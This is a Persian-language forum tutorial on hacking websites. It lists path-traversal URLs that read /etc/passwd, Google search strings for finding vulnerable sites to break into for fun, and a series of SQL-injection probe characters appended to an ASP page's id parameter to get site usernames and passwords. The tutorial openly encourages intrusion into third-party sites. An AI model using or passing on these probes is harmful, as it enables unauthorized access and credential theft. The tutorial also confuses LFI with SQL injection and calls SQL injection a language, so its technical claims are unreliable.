به این میگن Lfi ، نه Sql injection !
- نحوه ی استفاده از این نوع اسکریپت نویسی :
این روش اغلب بر روی سایت هایی که با ای اس پی نوشته می شوند بسیار کارکرد دارد.اما قبل از پیدایش زبان برنامه نویسی ASP اغلب هکر ها این نوع کد نویسی را بیشتر برای سایت هایی که با HTML نوشته شده بود استفاده می کردند چون ضعف در این نوع زبان برنامه نویسی بسیار زیاد بوده و هکر ها به راحتی می توانستند از آنها استفاده کنند اما بعد از پیدایش ای اس پی که زبان برنامه نویسی قوی بوده و امنیت در آن زیاد شده است کدهایی که بر روی اچ تی ام ال کار کرد داشت نتوانستند بر روی ای اس پی هم جواب بدهد به همین دلیل این نوع زبان sql injection نیز پیشرفت کرد ..... ما در ادامه مثالی می زنیم که هم بر روی صفحات اچ تی ام ال کارکرد دارد و هم بر روی ای اس پی
مثال : شما می توانید با اضافه کردن این کدها به آخر اسم سایت مورد نظر یوزر و پسورد سایت را به دست بیاورید . "در ضمن یاد آور شوم که شاید این نوع کدها دیگر کارکرد نداشته باشند"
حال مثلا شما می خواهید سایت www.Saiedhacker.com با این روش آزمایش کنید پس به صورت زیر عمل می کنید
www.Saiedhacker.com/samples/search/queryhit.html
www.Saiedhacker.com/etc/passwd
www.Saiedhacker.com/cgi-bin/htmlscript?../../../../etc/passwd
www.Saiedhacker.com/~root
www.Saiedhacker.com/../cgi-bin
حال اگر سایت مورد نظر شما بسته بود و شما می خواستید برای دلخوشی خودتون هم که شده یه سایت رو هک کنید و صفا کنید می تونید به سایت گوگل رفته و عبارت های زیر را جستجو کنید
samples/search/gueryhit.html
etc/passwd
cgi-bin/htmlscript?../../../../etc/passwd
root~/
/../cgi-bin
و سپس از سایت ها پیدا شده یکی را انتخاب کرده و سپس ببینید آیا این مشکل روی آنها صدق می کند یا خیر در صورت جواب مثبت آن سپس شما به دایرکتوری آن سایت رفته و می توانید پسورد و یوزر سایت را اگر دی کود نشده باشد را در فایل نوت پدی notepad مشاهده کنید.
حال آزمایش این اسکریپ نویسی بر روی صفحات ای اس پس
شما اگر در اینترنت اکسپلورر یا نت اسکیپ یا فایر فکس و ... در قسمت آدرس سایتی را که با صفحات ای اس پی مشاهده کرده باشید و به صفحه ی بعدی آن بروید نشانی مانند شکل زیر مشاهده می کنید
http://www.persianblog.com/post.asp?id=۶۵
حال ما می خواهیم به وسیله ی این آدرس به دایرکتوری سایت مورد نظر برویم سپس ما تمامی علایمی که بر روی کیبورد(/ و؛ و : و ...) وجود دارد را بعد از قسمت id= و قبل از شماره ی مذکور یعنی ۶۵ آزمایش می کنیم
مانند اشکال زیر
http://www.persianblog.com/post.asp?id='۶۵
http://www.persianblog.com/post.asp?id=/۶۵
http://www.persianblog.com/post.asp?id۶۵
http://www.persianblog.com/post.asp?id=:۶۵
http://www.persianblog.com/post.asp?id=.۶۵
http://www.persianblog.com/post.asp?id=\۶۵
http://www.persianblog.com/post.asp?id=|۶۵
http://www.persianblog.com/post.asp?id=[۶۵
http://www.persianblog.com/post.asp?id=-۶۵
http://www.persianblog.com/post.asp?id=_۶۵
و غیره......
حال مانند روش قبل به فایل نتد پد آن رفته و یوزر و پسورد آن را مشاهده نمایید.
اما گاهی بعد از اجرای این نوع کدها بر روی صفحات ای اس پی مشاهده می شود متنی انگلیسی ظاهر می شود و به دایرکتوری آن سایت وارد نمی شود این پیغام نه پیغام پیدا نکردن صفحات است بلکه پیغام دیگری است.برای یک مثال که ببینید نحوه ی کار به چه صورت است می توانید به لینک زیر بروید:
هک سایت با SQL Injection - انجمن های تخصصی ترفندستان | Tarfandestan Forums